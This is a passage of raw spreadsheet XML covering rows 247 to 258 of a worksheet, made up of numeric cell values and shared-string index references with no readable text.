      <c r="AV247">
        <v>0</v>
      </c>
      <c r="AW247">
        <v>12</v>
      </c>
      <c r="AX247">
        <v>3</v>
      </c>
      <c r="AY247">
        <v>38</v>
      </c>
      <c r="AZ247">
        <v>12</v>
      </c>
      <c r="BA247" t="s">
        <v>16734</v>
      </c>
      <c r="BB247" t="s">
        <v>14769</v>
      </c>
      <c r="BC247" t="s">
        <v>12508</v>
      </c>
      <c r="BD247">
        <v>0</v>
      </c>
    </row>
    <row r="248" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A248">
        <v>456</v>
      </c>
      <c r="B248" t="s">
        <v>2112</v>
      </c>
      <c r="C248" t="s">
        <v>99</v>
      </c>
      <c r="D248" t="s">
        <v>2113</v>
      </c>
      <c r="E248" t="s">
        <v>111</v>
      </c>
      <c r="F248" t="s">
        <v>2099</v>
      </c>
      <c r="G248" s="1">
        <v>44260</v>
      </c>
      <c r="H248">
        <v>7397</v>
      </c>
      <c r="I248">
        <v>7397</v>
      </c>
      <c r="J248">
        <v>1</v>
      </c>
      <c r="K248">
        <v>0</v>
      </c>
      <c r="L248">
        <v>1</v>
      </c>
      <c r="M248">
        <v>0</v>
      </c>
      <c r="N248">
        <v>0</v>
      </c>
      <c r="O248">
        <v>0</v>
      </c>
      <c r="P248">
        <v>0</v>
      </c>
      <c r="Q248">
        <v>0</v>
      </c>
      <c r="R248">
        <v>2</v>
      </c>
      <c r="S248">
        <v>0</v>
      </c>
      <c r="T248">
        <v>0</v>
      </c>
      <c r="U248">
        <v>30</v>
      </c>
      <c r="V248">
        <v>0</v>
      </c>
      <c r="W248">
        <v>5</v>
      </c>
      <c r="X248">
        <v>0</v>
      </c>
      <c r="Y248">
        <v>0</v>
      </c>
      <c r="Z248">
        <v>0</v>
      </c>
      <c r="AA248">
        <v>0</v>
      </c>
      <c r="AB248">
        <v>0</v>
      </c>
      <c r="AC248">
        <v>2</v>
      </c>
      <c r="AD248">
        <v>0</v>
      </c>
      <c r="AE248">
        <v>0</v>
      </c>
      <c r="AF248" t="s">
        <v>2114</v>
      </c>
      <c r="AG248">
        <v>14440</v>
      </c>
      <c r="AH248">
        <v>12</v>
      </c>
      <c r="AJ248">
        <v>160</v>
      </c>
      <c r="AK248" t="s">
        <v>396</v>
      </c>
      <c r="AL248" t="s">
        <v>396</v>
      </c>
      <c r="AM248" t="s">
        <v>2115</v>
      </c>
      <c r="AN248" t="s">
        <v>55</v>
      </c>
      <c r="AO248">
        <v>2008</v>
      </c>
      <c r="AP248" t="s">
        <v>2116</v>
      </c>
      <c r="AQ248" t="s">
        <v>2117</v>
      </c>
      <c r="AR248" t="s">
        <v>2118</v>
      </c>
      <c r="AS248" t="s">
        <v>71</v>
      </c>
      <c r="AT248" t="s">
        <v>58</v>
      </c>
      <c r="AU248">
        <v>26</v>
      </c>
      <c r="AV248">
        <v>1</v>
      </c>
      <c r="AW248">
        <v>0</v>
      </c>
      <c r="AX248">
        <v>0</v>
      </c>
      <c r="AY248">
        <v>11</v>
      </c>
      <c r="AZ248">
        <v>3</v>
      </c>
      <c r="BA248" t="s">
        <v>16697</v>
      </c>
      <c r="BB248" t="s">
        <v>14589</v>
      </c>
      <c r="BC248">
        <v>0</v>
      </c>
      <c r="BD248" t="s">
        <v>12510</v>
      </c>
    </row>
    <row r="249" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A249">
        <v>21</v>
      </c>
      <c r="B249" t="s">
        <v>2119</v>
      </c>
      <c r="C249" t="s">
        <v>1672</v>
      </c>
      <c r="D249" t="s">
        <v>2120</v>
      </c>
      <c r="E249" t="s">
        <v>809</v>
      </c>
      <c r="F249" t="s">
        <v>2121</v>
      </c>
      <c r="G249" s="1">
        <v>44188</v>
      </c>
      <c r="H249">
        <v>7430</v>
      </c>
      <c r="I249">
        <v>7430</v>
      </c>
      <c r="J249">
        <v>2</v>
      </c>
      <c r="K249">
        <v>0</v>
      </c>
      <c r="L249">
        <v>0</v>
      </c>
      <c r="M249">
        <v>2</v>
      </c>
      <c r="N249">
        <v>0</v>
      </c>
      <c r="O249">
        <v>0</v>
      </c>
      <c r="P249">
        <v>0</v>
      </c>
      <c r="Q249">
        <v>4</v>
      </c>
      <c r="R249">
        <v>14</v>
      </c>
      <c r="S249">
        <v>1</v>
      </c>
      <c r="T249">
        <v>1</v>
      </c>
      <c r="U249">
        <v>40000</v>
      </c>
      <c r="V249">
        <v>0</v>
      </c>
      <c r="W249">
        <v>0</v>
      </c>
      <c r="X249">
        <v>500</v>
      </c>
      <c r="Y249">
        <v>0</v>
      </c>
      <c r="Z249">
        <v>0</v>
      </c>
      <c r="AA249">
        <v>0</v>
      </c>
      <c r="AB249">
        <v>200</v>
      </c>
      <c r="AC249">
        <v>5000</v>
      </c>
      <c r="AD249">
        <v>1</v>
      </c>
      <c r="AE249">
        <v>2000</v>
      </c>
      <c r="AF249" t="s">
        <v>2122</v>
      </c>
      <c r="AG249">
        <v>70245</v>
      </c>
      <c r="AH249">
        <v>22</v>
      </c>
      <c r="AJ249">
        <v>354</v>
      </c>
      <c r="AK249" t="s">
        <v>1909</v>
      </c>
      <c r="AL249" t="s">
        <v>2123</v>
      </c>
      <c r="AM249" t="s">
        <v>2124</v>
      </c>
      <c r="AN249" t="s">
        <v>55</v>
      </c>
      <c r="AO249">
        <v>2016</v>
      </c>
      <c r="AP249" t="s">
        <v>2125</v>
      </c>
      <c r="AQ249" t="s">
        <v>2126</v>
      </c>
      <c r="AR249" t="s">
        <v>2127</v>
      </c>
      <c r="AS249" t="s">
        <v>71</v>
      </c>
      <c r="AT249" t="s">
        <v>58</v>
      </c>
      <c r="AU249">
        <v>26</v>
      </c>
      <c r="AV249">
        <v>1</v>
      </c>
      <c r="AW249">
        <v>41</v>
      </c>
      <c r="AX249">
        <v>250</v>
      </c>
      <c r="AY249">
        <v>12</v>
      </c>
      <c r="AZ249">
        <v>48</v>
      </c>
      <c r="BA249" t="s">
        <v>16587</v>
      </c>
      <c r="BB249" t="s">
        <v>14225</v>
      </c>
      <c r="BC249">
        <v>0</v>
      </c>
      <c r="BD249" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="250" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A250">
        <v>549</v>
      </c>
      <c r="B250" t="s">
        <v>2128</v>
      </c>
      <c r="C250" t="s">
        <v>157</v>
      </c>
      <c r="D250" t="s">
        <v>2129</v>
      </c>
      <c r="E250" t="s">
        <v>142</v>
      </c>
      <c r="F250" t="s">
        <v>2130</v>
      </c>
      <c r="G250" s="1">
        <v>44253</v>
      </c>
      <c r="H250">
        <v>7681</v>
      </c>
      <c r="I250">
        <v>7681</v>
      </c>
      <c r="J250">
        <v>2</v>
      </c>
      <c r="K250">
        <v>0</v>
      </c>
      <c r="L250">
        <v>2</v>
      </c>
      <c r="M250">
        <v>2</v>
      </c>
      <c r="N250">
        <v>4200</v>
      </c>
      <c r="O250">
        <v>0</v>
      </c>
      <c r="P250">
        <v>0</v>
      </c>
      <c r="Q250">
        <v>4</v>
      </c>
      <c r="R250">
        <v>96</v>
      </c>
      <c r="S250">
        <v>0</v>
      </c>
      <c r="T250">
        <v>1</v>
      </c>
      <c r="U250">
        <v>240000</v>
      </c>
      <c r="V250">
        <v>0</v>
      </c>
      <c r="W250">
        <v>13500</v>
      </c>
      <c r="X250">
        <v>3900</v>
      </c>
      <c r="Y250">
        <v>0</v>
      </c>
      <c r="Z250">
        <v>0</v>
      </c>
      <c r="AA250">
        <v>0</v>
      </c>
      <c r="AB250">
        <v>160</v>
      </c>
      <c r="AC250">
        <v>24000</v>
      </c>
      <c r="AD250">
        <v>0</v>
      </c>
      <c r="AE250">
        <v>16000</v>
      </c>
      <c r="AF250" t="s">
        <v>2131</v>
      </c>
      <c r="AG250">
        <v>68461</v>
      </c>
      <c r="AH250">
        <v>16</v>
      </c>
      <c r="AJ250">
        <v>237</v>
      </c>
      <c r="AK250" t="s">
        <v>2132</v>
      </c>
      <c r="AL250" t="s">
        <v>2133</v>
      </c>
      <c r="AM250" t="s">
        <v>2134</v>
      </c>
      <c r="AN250" t="s">
        <v>55</v>
      </c>
      <c r="AO250">
        <v>2001</v>
      </c>
      <c r="AP250">
        <v>333630200</v>
      </c>
      <c r="AQ250" t="s">
        <v>2135</v>
      </c>
      <c r="AR250" t="s">
        <v>2136</v>
      </c>
      <c r="AS250" t="s">
        <v>71</v>
      </c>
      <c r="AT250" t="s">
        <v>58</v>
      </c>
      <c r="AU250">
        <v>25</v>
      </c>
      <c r="AV250">
        <v>1</v>
      </c>
      <c r="AW250">
        <v>75</v>
      </c>
      <c r="AX250">
        <v>37</v>
      </c>
      <c r="AY250">
        <v>49</v>
      </c>
      <c r="AZ250">
        <v>18</v>
      </c>
      <c r="BA250">
        <v>0</v>
      </c>
      <c r="BB250" t="s">
        <v>14665</v>
      </c>
      <c r="BC250" t="s">
        <v>9536</v>
      </c>
      <c r="BD250">
        <v>0</v>
      </c>
    </row>
    <row r="251" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A251">
        <v>42</v>
      </c>
      <c r="B251" t="s">
        <v>2137</v>
      </c>
      <c r="C251" t="s">
        <v>99</v>
      </c>
      <c r="D251" t="s">
        <v>2138</v>
      </c>
      <c r="E251" t="s">
        <v>142</v>
      </c>
      <c r="F251" t="s">
        <v>2139</v>
      </c>
      <c r="G251" s="1">
        <v>44231</v>
      </c>
      <c r="H251">
        <v>7703</v>
      </c>
      <c r="I251">
        <v>7703</v>
      </c>
      <c r="J251">
        <v>2</v>
      </c>
      <c r="K251">
        <v>0</v>
      </c>
      <c r="L251">
        <v>2</v>
      </c>
      <c r="M251">
        <v>0</v>
      </c>
      <c r="N251">
        <v>0</v>
      </c>
      <c r="O251">
        <v>0</v>
      </c>
      <c r="P251">
        <v>0</v>
      </c>
      <c r="Q251">
        <v>0</v>
      </c>
      <c r="R251">
        <v>0</v>
      </c>
      <c r="S251">
        <v>0</v>
      </c>
      <c r="T251">
        <v>2</v>
      </c>
      <c r="U251">
        <v>100000</v>
      </c>
      <c r="V251">
        <v>0</v>
      </c>
      <c r="W251">
        <v>5000</v>
      </c>
      <c r="X251">
        <v>0</v>
      </c>
      <c r="Y251">
        <v>0</v>
      </c>
      <c r="Z251">
        <v>0</v>
      </c>
      <c r="AA251">
        <v>0</v>
      </c>
      <c r="AB251">
        <v>0</v>
      </c>
      <c r="AC251">
        <v>0</v>
      </c>
      <c r="AD251">
        <v>0</v>
      </c>
      <c r="AE251">
        <v>5000</v>
      </c>
      <c r="AF251" t="s">
        <v>152</v>
      </c>
      <c r="AG251">
        <v>14440</v>
      </c>
      <c r="AH251">
        <v>12</v>
      </c>
      <c r="AJ251">
        <v>160</v>
      </c>
      <c r="AK251" t="s">
        <v>114</v>
      </c>
      <c r="AL251" t="s">
        <v>114</v>
      </c>
      <c r="AM251" t="s">
        <v>2140</v>
      </c>
      <c r="AN251" t="s">
        <v>55</v>
      </c>
      <c r="AO251">
        <v>2014</v>
      </c>
      <c r="AP251">
        <v>2129623333</v>
      </c>
      <c r="AQ251" t="s">
        <v>2141</v>
      </c>
      <c r="AR251" t="s">
        <v>2142</v>
      </c>
      <c r="AS251" t="s">
        <v>71</v>
      </c>
      <c r="AT251" t="s">
        <v>58</v>
      </c>
      <c r="AU251">
        <v>25</v>
      </c>
      <c r="AV251">
        <v>0</v>
      </c>
      <c r="AW251">
        <v>0</v>
      </c>
      <c r="AX251">
        <v>0</v>
      </c>
      <c r="AY251">
        <v>56</v>
      </c>
      <c r="AZ251">
        <v>11</v>
      </c>
      <c r="BA251" t="s">
        <v>16591</v>
      </c>
      <c r="BB251" t="s">
        <v>14246</v>
      </c>
      <c r="BC251">
        <v>0</v>
      </c>
      <c r="BD251" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="252" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A252">
        <v>7</v>
      </c>
      <c r="B252" t="s">
        <v>2143</v>
      </c>
      <c r="C252" t="s">
        <v>99</v>
      </c>
      <c r="D252" t="s">
        <v>2144</v>
      </c>
      <c r="E252" t="s">
        <v>843</v>
      </c>
      <c r="F252" t="s">
        <v>2145</v>
      </c>
      <c r="G252" s="1">
        <v>44207</v>
      </c>
      <c r="H252">
        <v>7743</v>
      </c>
      <c r="I252">
        <v>7743</v>
      </c>
      <c r="J252">
        <v>1</v>
      </c>
      <c r="K252">
        <v>0</v>
      </c>
      <c r="L252">
        <v>0</v>
      </c>
      <c r="M252">
        <v>0</v>
      </c>
      <c r="N252">
        <v>0</v>
      </c>
      <c r="O252">
        <v>0</v>
      </c>
      <c r="P252">
        <v>0</v>
      </c>
      <c r="Q252">
        <v>0</v>
      </c>
      <c r="R252">
        <v>0</v>
      </c>
      <c r="S252">
        <v>0</v>
      </c>
      <c r="T252">
        <v>0</v>
      </c>
      <c r="U252">
        <v>100000</v>
      </c>
      <c r="V252">
        <v>0</v>
      </c>
      <c r="W252">
        <v>0</v>
      </c>
      <c r="X252">
        <v>0</v>
      </c>
      <c r="Y252">
        <v>0</v>
      </c>
      <c r="Z252">
        <v>0</v>
      </c>
      <c r="AA252">
        <v>0</v>
      </c>
      <c r="AB252">
        <v>0</v>
      </c>
      <c r="AC252">
        <v>0</v>
      </c>
      <c r="AD252">
        <v>0</v>
      </c>
      <c r="AE252">
        <v>0</v>
      </c>
      <c r="AF252" t="s">
        <v>2146</v>
      </c>
      <c r="AG252">
        <v>13430</v>
      </c>
      <c r="AH252">
        <v>12</v>
      </c>
      <c r="AJ252">
        <v>157</v>
      </c>
      <c r="AK252" t="s">
        <v>2147</v>
      </c>
      <c r="AL252" t="s">
        <v>2148</v>
      </c>
      <c r="AM252" t="s">
        <v>2149</v>
      </c>
      <c r="AN252" t="s">
        <v>82</v>
      </c>
      <c r="AO252">
        <v>2011</v>
      </c>
      <c r="AP252">
        <v>81280140041</v>
      </c>
      <c r="AQ252" t="s">
        <v>2150</v>
      </c>
      <c r="AR252" t="s">
        <v>2151</v>
      </c>
      <c r="AS252" t="s">
        <v>179</v>
      </c>
      <c r="AT252" t="s">
        <v>86</v>
      </c>
      <c r="AU252">
        <v>6</v>
      </c>
      <c r="AV252">
        <v>2</v>
      </c>
      <c r="AW252">
        <v>0</v>
      </c>
      <c r="AX252">
        <v>0</v>
      </c>
      <c r="AY252">
        <v>4</v>
      </c>
      <c r="AZ252">
        <v>2</v>
      </c>
      <c r="BA252" t="s">
        <v>17616</v>
      </c>
      <c r="BB252" t="s">
        <v>14210</v>
      </c>
      <c r="BC252" t="s">
        <v>11980</v>
      </c>
      <c r="BD252">
        <v>0</v>
      </c>
    </row>
    <row r="253" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A253">
        <v>51</v>
      </c>
      <c r="B253" t="s">
        <v>2152</v>
      </c>
      <c r="C253" t="s">
        <v>99</v>
      </c>
      <c r="D253" t="s">
        <v>2153</v>
      </c>
      <c r="E253" t="s">
        <v>843</v>
      </c>
      <c r="F253" t="s">
        <v>2154</v>
      </c>
      <c r="G253" s="1">
        <v>44232</v>
      </c>
      <c r="H253">
        <v>7749</v>
      </c>
      <c r="I253">
        <v>7749</v>
      </c>
      <c r="J253">
        <v>1</v>
      </c>
      <c r="K253">
        <v>0</v>
      </c>
      <c r="L253">
        <v>0</v>
      </c>
      <c r="M253">
        <v>0</v>
      </c>
      <c r="N253">
        <v>0</v>
      </c>
      <c r="O253">
        <v>0</v>
      </c>
      <c r="P253">
        <v>0</v>
      </c>
      <c r="Q253">
        <v>0</v>
      </c>
      <c r="R253">
        <v>0</v>
      </c>
      <c r="S253">
        <v>0</v>
      </c>
      <c r="T253">
        <v>0</v>
      </c>
      <c r="U253">
        <v>50000</v>
      </c>
      <c r="V253">
        <v>0</v>
      </c>
      <c r="W253">
        <v>0</v>
      </c>
      <c r="X253">
        <v>0</v>
      </c>
      <c r="Y253">
        <v>0</v>
      </c>
      <c r="Z253">
        <v>0</v>
      </c>
      <c r="AA253">
        <v>0</v>
      </c>
      <c r="AB253">
        <v>0</v>
      </c>
      <c r="AC253">
        <v>0</v>
      </c>
      <c r="AD253">
        <v>0</v>
      </c>
      <c r="AE253">
        <v>0</v>
      </c>
      <c r="AF253" t="s">
        <v>2155</v>
      </c>
      <c r="AG253">
        <v>13430</v>
      </c>
      <c r="AH253">
        <v>12</v>
      </c>
      <c r="AJ253">
        <v>157</v>
      </c>
      <c r="AK253" t="s">
        <v>2147</v>
      </c>
      <c r="AL253" t="s">
        <v>2148</v>
      </c>
      <c r="AM253" t="s">
        <v>2156</v>
      </c>
      <c r="AN253" t="s">
        <v>68</v>
      </c>
      <c r="AO253">
        <v>2008</v>
      </c>
      <c r="AP253">
        <v>81318387798</v>
      </c>
      <c r="AQ253" t="s">
        <v>2157</v>
      </c>
      <c r="AR253" t="s">
        <v>2158</v>
      </c>
      <c r="AS253" t="s">
        <v>179</v>
      </c>
      <c r="AT253" t="s">
        <v>58</v>
      </c>
      <c r="AU253">
        <v>30</v>
      </c>
      <c r="AV253">
        <v>1</v>
      </c>
      <c r="AW253">
        <v>1</v>
      </c>
      <c r="AX253">
        <v>0</v>
      </c>
      <c r="AY253">
        <v>7</v>
      </c>
      <c r="AZ253">
        <v>7</v>
      </c>
      <c r="BA253" t="s">
        <v>16595</v>
      </c>
      <c r="BB253" t="s">
        <v>14253</v>
      </c>
      <c r="BC253" t="s">
        <v>10442</v>
      </c>
      <c r="BD253">
        <v>0</v>
      </c>
    </row>
    <row r="254" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A254">
        <v>834</v>
      </c>
      <c r="B254" t="s">
        <v>2159</v>
      </c>
      <c r="C254" t="s">
        <v>2160</v>
      </c>
      <c r="D254" t="s">
        <v>2161</v>
      </c>
      <c r="E254" t="s">
        <v>528</v>
      </c>
      <c r="F254" t="s">
        <v>2162</v>
      </c>
      <c r="G254" s="1">
        <v>44382</v>
      </c>
      <c r="H254">
        <v>7778</v>
      </c>
      <c r="I254">
        <v>7778</v>
      </c>
      <c r="J254">
        <v>10</v>
      </c>
      <c r="K254">
        <v>0</v>
      </c>
      <c r="L254">
        <v>0</v>
      </c>
      <c r="M254">
        <v>0</v>
      </c>
      <c r="N254">
        <v>0</v>
      </c>
      <c r="O254">
        <v>0</v>
      </c>
      <c r="P254">
        <v>0</v>
      </c>
      <c r="Q254">
        <v>5</v>
      </c>
      <c r="R254">
        <v>1</v>
      </c>
      <c r="S254">
        <v>1</v>
      </c>
      <c r="T254">
        <v>1</v>
      </c>
      <c r="U254">
        <v>1000</v>
      </c>
      <c r="V254">
        <v>0</v>
      </c>
      <c r="W254">
        <v>0</v>
      </c>
      <c r="X254">
        <v>0</v>
      </c>
      <c r="Y254">
        <v>0</v>
      </c>
      <c r="Z254">
        <v>0</v>
      </c>
      <c r="AA254">
        <v>0</v>
      </c>
      <c r="AB254">
        <v>3600</v>
      </c>
      <c r="AC254">
        <v>5000</v>
      </c>
      <c r="AD254">
        <v>1</v>
      </c>
      <c r="AE254">
        <v>500</v>
      </c>
      <c r="AF254" t="s">
        <v>2163</v>
      </c>
      <c r="AG254">
        <v>74181</v>
      </c>
      <c r="AH254">
        <v>21</v>
      </c>
      <c r="AJ254">
        <v>329</v>
      </c>
      <c r="AK254" t="s">
        <v>2164</v>
      </c>
      <c r="AL254" t="s">
        <v>2165</v>
      </c>
      <c r="AM254" t="s">
        <v>2166</v>
      </c>
      <c r="AN254" t="s">
        <v>68</v>
      </c>
      <c r="AO254">
        <v>2007</v>
      </c>
      <c r="AP254">
        <v>82157222528</v>
      </c>
      <c r="AQ254" t="s">
        <v>2167</v>
      </c>
      <c r="AR254" t="s">
        <v>2163</v>
      </c>
      <c r="AS254" t="s">
        <v>71</v>
      </c>
      <c r="AT254" t="s">
        <v>72</v>
      </c>
      <c r="AU254">
        <v>0</v>
      </c>
      <c r="AV254">
        <v>0</v>
      </c>
      <c r="AW254">
        <v>0</v>
      </c>
      <c r="AX254">
        <v>0</v>
      </c>
      <c r="AY254">
        <v>2</v>
      </c>
      <c r="AZ254">
        <v>9</v>
      </c>
      <c r="BA254" t="s">
        <v>17617</v>
      </c>
      <c r="BB254" t="s">
        <v>14881</v>
      </c>
      <c r="BC254" t="s">
        <v>12665</v>
      </c>
      <c r="BD254" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="255" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A255">
        <v>50</v>
      </c>
      <c r="B255" t="s">
        <v>2168</v>
      </c>
      <c r="C255" t="s">
        <v>99</v>
      </c>
      <c r="D255" t="s">
        <v>2169</v>
      </c>
      <c r="E255" t="s">
        <v>300</v>
      </c>
      <c r="F255" t="s">
        <v>2170</v>
      </c>
      <c r="G255" s="1">
        <v>44232</v>
      </c>
      <c r="H255">
        <v>7812</v>
      </c>
      <c r="I255">
        <v>7812</v>
      </c>
      <c r="J255">
        <v>1</v>
      </c>
      <c r="K255">
        <v>0</v>
      </c>
      <c r="L255">
        <v>0</v>
      </c>
      <c r="M255">
        <v>0</v>
      </c>
      <c r="N255">
        <v>0</v>
      </c>
      <c r="O255">
        <v>0</v>
      </c>
      <c r="P255">
        <v>0</v>
      </c>
      <c r="Q255">
        <v>0</v>
      </c>
      <c r="R255">
        <v>0</v>
      </c>
      <c r="S255">
        <v>0</v>
      </c>
      <c r="T255">
        <v>0</v>
      </c>
      <c r="U255">
        <v>200000</v>
      </c>
      <c r="V255">
        <v>0</v>
      </c>
      <c r="W255">
        <v>0</v>
      </c>
      <c r="X255">
        <v>0</v>
      </c>
      <c r="Y255">
        <v>0</v>
      </c>
      <c r="Z255">
        <v>0</v>
      </c>
      <c r="AA255">
        <v>0</v>
      </c>
      <c r="AB255">
        <v>0</v>
      </c>
      <c r="AC255">
        <v>0</v>
      </c>
      <c r="AD255">
        <v>0</v>
      </c>
      <c r="AE255">
        <v>0</v>
      </c>
      <c r="AF255" t="s">
        <v>2171</v>
      </c>
      <c r="AG255">
        <v>13430</v>
      </c>
      <c r="AH255">
        <v>12</v>
      </c>
      <c r="AJ255">
        <v>157</v>
      </c>
      <c r="AK255" t="s">
        <v>2147</v>
      </c>
      <c r="AL255" t="s">
        <v>2148</v>
      </c>
      <c r="AM255" t="s">
        <v>2172</v>
      </c>
      <c r="AN255" t="s">
        <v>55</v>
      </c>
      <c r="AO255">
        <v>2008</v>
      </c>
      <c r="AP255">
        <v>818732373</v>
      </c>
      <c r="AQ255" t="s">
        <v>2173</v>
      </c>
      <c r="AR255" t="s">
        <v>2174</v>
      </c>
      <c r="AS255" t="s">
        <v>179</v>
      </c>
      <c r="AT255" t="s">
        <v>58</v>
      </c>
      <c r="AU255">
        <v>25</v>
      </c>
      <c r="AV255">
        <v>1</v>
      </c>
      <c r="AW255">
        <v>0</v>
      </c>
      <c r="AX255">
        <v>0</v>
      </c>
      <c r="AY255">
        <v>3</v>
      </c>
      <c r="AZ255">
        <v>3</v>
      </c>
      <c r="BA255" t="s">
        <v>16594</v>
      </c>
      <c r="BB255" t="s">
        <v>14252</v>
      </c>
      <c r="BC255" t="s">
        <v>12676</v>
      </c>
      <c r="BD255">
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A256">
        <v>466</v>
      </c>
      <c r="B256" t="s">
        <v>2175</v>
      </c>
      <c r="C256" t="s">
        <v>224</v>
      </c>
      <c r="D256" t="s">
        <v>2176</v>
      </c>
      <c r="E256" t="s">
        <v>142</v>
      </c>
      <c r="F256" t="s">
        <v>143</v>
      </c>
      <c r="G256" s="1">
        <v>44252</v>
      </c>
      <c r="H256">
        <v>7887</v>
      </c>
      <c r="I256">
        <v>7887</v>
      </c>
      <c r="J256">
        <v>0</v>
      </c>
      <c r="K256">
        <v>0</v>
      </c>
      <c r="L256">
        <v>0</v>
      </c>
      <c r="M256">
        <v>0</v>
      </c>
      <c r="N256">
        <v>0</v>
      </c>
      <c r="O256">
        <v>0</v>
      </c>
      <c r="P256">
        <v>0</v>
      </c>
      <c r="Q256">
        <v>1</v>
      </c>
      <c r="R256">
        <v>0</v>
      </c>
      <c r="S256">
        <v>0</v>
      </c>
      <c r="T256">
        <v>1</v>
      </c>
      <c r="U256">
        <v>0</v>
      </c>
      <c r="V256">
        <v>0</v>
      </c>
      <c r="W256">
        <v>0</v>
      </c>
      <c r="X256">
        <v>0</v>
      </c>
      <c r="Y256">
        <v>0</v>
      </c>
      <c r="Z256">
        <v>0</v>
      </c>
      <c r="AA256">
        <v>0</v>
      </c>
      <c r="AB256">
        <v>10</v>
      </c>
      <c r="AC256">
        <v>0</v>
      </c>
      <c r="AD256">
        <v>0</v>
      </c>
      <c r="AE256">
        <v>500</v>
      </c>
      <c r="AF256" t="s">
        <v>2177</v>
      </c>
      <c r="AG256">
        <v>55753</v>
      </c>
      <c r="AH256">
        <v>15</v>
      </c>
      <c r="AJ256">
        <v>224</v>
      </c>
      <c r="AK256" t="s">
        <v>2178</v>
      </c>
      <c r="AL256" t="s">
        <v>2179</v>
      </c>
      <c r="AM256" t="s">
        <v>2180</v>
      </c>
      <c r="AN256" t="s">
        <v>68</v>
      </c>
      <c r="AO256">
        <v>2013</v>
      </c>
      <c r="AP256">
        <v>8122779696</v>
      </c>
      <c r="AQ256" t="s">
        <v>2181</v>
      </c>
      <c r="AR256" t="s">
        <v>2177</v>
      </c>
      <c r="AS256" t="s">
        <v>71</v>
      </c>
      <c r="AT256" t="s">
        <v>72</v>
      </c>
      <c r="AU256">
        <v>6</v>
      </c>
      <c r="AV256">
        <v>1</v>
      </c>
      <c r="AW256">
        <v>1</v>
      </c>
      <c r="AX256">
        <v>5</v>
      </c>
      <c r="AY256">
        <v>0</v>
      </c>
      <c r="AZ256">
        <v>0</v>
      </c>
      <c r="BA256" t="s">
        <v>17622</v>
      </c>
      <c r="BB256" t="s">
        <v>14597</v>
      </c>
      <c r="BC256" t="s">
        <v>13007</v>
      </c>
      <c r="BD256">
        <v>0</v>
      </c>
    </row>
    <row r="257" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A257">
        <v>485</v>
      </c>
      <c r="B257" t="s">
        <v>2182</v>
      </c>
      <c r="C257" t="s">
        <v>477</v>
      </c>
      <c r="D257" t="s">
        <v>2183</v>
      </c>
      <c r="E257" t="s">
        <v>2184</v>
      </c>
      <c r="F257" t="s">
        <v>2185</v>
      </c>
      <c r="G257" s="1">
        <v>44267</v>
      </c>
      <c r="H257">
        <v>7960</v>
      </c>
      <c r="I257">
        <v>7960</v>
      </c>
      <c r="J257">
        <v>1</v>
      </c>
      <c r="K257">
        <v>1</v>
      </c>
      <c r="L257">
        <v>0</v>
      </c>
      <c r="M257">
        <v>0</v>
      </c>
      <c r="N257">
        <v>0</v>
      </c>
      <c r="O257">
        <v>0</v>
      </c>
      <c r="P257">
        <v>0</v>
      </c>
      <c r="Q257">
        <v>4</v>
      </c>
      <c r="R257">
        <v>9</v>
      </c>
      <c r="S257">
        <v>1</v>
      </c>
      <c r="T257">
        <v>0</v>
      </c>
      <c r="U257">
        <v>20</v>
      </c>
      <c r="V257">
        <v>1</v>
      </c>
      <c r="W257">
        <v>0</v>
      </c>
      <c r="X257">
        <v>0</v>
      </c>
      <c r="Y257">
        <v>0</v>
      </c>
      <c r="Z257">
        <v>0</v>
      </c>
      <c r="AA257">
        <v>0</v>
      </c>
      <c r="AB257">
        <v>5000</v>
      </c>
      <c r="AC257">
        <v>2200</v>
      </c>
      <c r="AD257">
        <v>1</v>
      </c>
      <c r="AE257">
        <v>0</v>
      </c>
      <c r="AF257" t="s">
        <v>2186</v>
      </c>
      <c r="AG257">
        <v>95370</v>
      </c>
      <c r="AH257">
        <v>29</v>
      </c>
      <c r="AJ257">
        <v>376</v>
      </c>
      <c r="AK257" t="s">
        <v>2187</v>
      </c>
      <c r="AL257" t="s">
        <v>2188</v>
      </c>
      <c r="AM257" t="s">
        <v>2189</v>
      </c>
      <c r="AN257" t="s">
        <v>55</v>
      </c>
      <c r="AO257">
        <v>2017</v>
      </c>
      <c r="AP257">
        <v>81382429630</v>
      </c>
      <c r="AQ257" t="s">
        <v>2190</v>
      </c>
      <c r="AR257" t="s">
        <v>2191</v>
      </c>
      <c r="AS257" t="s">
        <v>71</v>
      </c>
      <c r="AT257" t="s">
        <v>58</v>
      </c>
      <c r="AU257">
        <v>6</v>
      </c>
      <c r="AV257">
        <v>0</v>
      </c>
      <c r="AW257">
        <v>0</v>
      </c>
      <c r="AX257">
        <v>0</v>
      </c>
      <c r="AY257">
        <v>11</v>
      </c>
      <c r="AZ257">
        <v>1</v>
      </c>
      <c r="BA257" t="s">
        <v>17173</v>
      </c>
      <c r="BB257" t="s">
        <v>14613</v>
      </c>
      <c r="BC257">
        <v>0</v>
      </c>
      <c r="BD257" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="258" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A258">
        <v>446</v>
      </c>
      <c r="B258" t="s">
        <v>2192</v>
      </c>
      <c r="C258" t="s">
        <v>579</v>
      </c>
      <c r="D258" t="s">
        <v>2193</v>
      </c>
      <c r="E258" t="s">
        <v>142</v>
      </c>
      <c r="F258" t="s">
        <v>562</v>
      </c>
      <c r="G258" s="1">
        <v>44217</v>
      </c>
      <c r="H258">
        <v>8166</v>
      </c>
      <c r="I258">
        <v>8166</v>
      </c>
      <c r="J258">
        <v>3</v>
      </c>
      <c r="K258">
        <v>0</v>
      </c>
      <c r="L258">
        <v>3</v>
      </c>
      <c r="M258">
        <v>9</v>
      </c>
      <c r="N258">
        <v>3500</v>
      </c>
      <c r="O258">
        <v>0</v>
      </c>
      <c r="P258">
        <v>0</v>
      </c>
      <c r="Q258">
        <v>12</v>
      </c>
      <c r="R258">
        <v>50</v>
